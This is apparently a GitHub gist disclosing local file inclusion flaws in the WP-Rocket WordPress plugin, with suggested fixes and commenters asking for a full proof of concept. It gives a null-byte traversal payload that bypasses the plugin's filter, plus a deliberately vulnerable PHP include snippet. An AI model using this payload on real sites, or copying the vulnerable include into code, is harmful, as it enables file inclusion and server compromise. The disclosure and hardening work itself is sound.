
@Shinkurt
Created July 25, 2017 14:37
WP-Media: WP-Rocket
Details:
Using PHP Version: 5.6.1
Apache/ini Settings: unnecessary
WP-Rocket Version: 2.9.3
1st. Vulnerability: a bypass of the previously patched issue. The patch is incomplete and can be circumvented.
The patch looks like: /inc/front/process.php
42: $host = str_replace( array( '..', chr(0) ), '', $host );
But poking around, I have found a bypass for that specific fix, so the first vulnerability, which was patched in 2015, is still reproducible.
The payload I used is: .%00.../.%00.../path/file/to/include
Because of the %00 between the dots, the filter's removal of '..' does not consume all of them, and since the null byte is stripped afterwards as an empty character, the leftover dots join into ../../ when .%00.../.%00.../ is sent.
To test this, use the following PHP code:
<?php
// Same filter as the WP-Rocket patch: removes '..' first, then the null byte
$host = $_SERVER['HTTP_HOST'];
$host = str_replace( array( '..', chr(0) ), '', $host );
// Deliberately vulnerable test: the filtered host is used directly as an include path
include $host;
and send .%00.../.%00.../path/file/to/include
and that file will be included, so the first patch is wholly ineffective and over 200k sites have been running a vulnerable version ever since.
2nd. Local File Inclusion in wp-rocket/min/config.php:
10: $host = $_SERVER['HTTP_HOST']; << SINK
11: $host = str_replace( array( '..', chr(0) ), '', $host );
12: $wp_rocket_config_file = dirname( dirname( dirname( dirname( __FILE__ ) ) ) ) . '/wp-rocket-config/' . $host . '.php';
    if ( file_exists( $wp_rocket_config_file ) && ! defined( 'ABSPATH' ) ) {
        // Create fake ABSPATH
        define( 'ABSPATH', null );
18:     require( $wp_rocket_config_file ); << ISSUE
    }
As you can see, the same issue found in process.php occurs here: $host (a user-controlled value) is used in the included path, and line 11 is the same patch, which is also bypassable with my demo payload:
.%00.../.%00.../
The remaining bugs, concerning Imagify, were sent to Gregory; he validated them and will issue a patch.
Fix should be easy:
// Allow only a fixed set of config names instead of filtering a user-supplied value
// ($file stands for the requested name)
$safe_files = array( "test", "config", "includes", "special" );
// Strict comparison so PHP's loose in_array() matching cannot be abused
if ( in_array( $file, $safe_files, true ) ) {
    require_once $file . "/config.php";
}
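As an added illustration (not code from the gist or from WP-Rocket), the PHP below shows why the sequential str_replace() filter emits ../../ for the decoded payload quoted above, and a hardened way to build the per-host config path that validates the hostname instead of stripping substrings. The function names, the hostname pattern, the realpath() containment check and the use of sys_get_temp_dir() as a stand-in config directory are this example's own assumptions.

```php
<?php
// Added example, not code from the gist or from WP-Rocket.
// Part 1: why the sequential str_replace() filter yields ../../ for the
// decoded payload. Part 2: a hardened way to build the per-host config path.

// The filter from the patch. With an array of search strings, str_replace()
// applies each replacement in turn to the output of the previous one.
function vulnerable_filter( $host ) {
    return str_replace( array( '..', chr( 0 ) ), '', $host );
}

// Hardened replacement (assumed design, not the vendor's fix): reject any
// value that is not a plain hostname with an optional port, then confirm the
// resolved file really sits inside $config_dir. Returns null on rejection or
// when no config file exists for that host.
function safe_config_path( $host, $config_dir ) {
    $label = '[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?';
    if ( ! preg_match( "/^{$label}(\\.{$label})*(:[0-9]{1,5})?$/", $host ) ) {
        return null;
    }
    $base = realpath( $config_dir );
    $real = realpath( $config_dir . DIRECTORY_SEPARATOR . $host . '.php' );
    if ( $base === false || $real === false ) {
        return null;
    }
    // Containment check: the resolved path must start with "<config_dir>/".
    if ( strncmp( $real, $base . DIRECTORY_SEPARATOR, strlen( $base ) + 1 ) !== 0 ) {
        return null;
    }
    return $real;
}

// Constructed input: the gist's payload with %00 already decoded to a NUL byte.
$payload = ".\0.../.\0.../path/file/to/include";

// First pass removes '..' from each '...', leaving '.', NUL, '.'; the second
// pass deletes the NUL bytes and the remaining dots join into '../'.
var_dump( vulnerable_filter( $payload ) );   // string(26) "../../path/file/to/include"

// The hardened builder rejects the payload outright (the NUL byte and the
// slashes fail the hostname pattern), so no path is ever constructed from it.
var_dump( safe_config_path( $payload, sys_get_temp_dir() ) );   // NULL
```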

ghost commented Jul 17, 2018

Hi, can you do an example with a complete url?

@w9w

w9w commented Oct 15, 2018

Full PoC please

@JohnTroony

Hey, I don't understand your PoC. Do you mind explaining a bit more?

@keyurvala

keyurvala commented Mar 12, 2020

Can you please explain in detail?

@Singh1Harjot

Full PoC please

@whatsdd

whatsdd commented Apr 22, 2022

Full PoC please

@CyberWorld121220

Hey, I don't understand your PoC. Do you mind explaining a bit more?

@dragonked2

Full PoC including example URL please
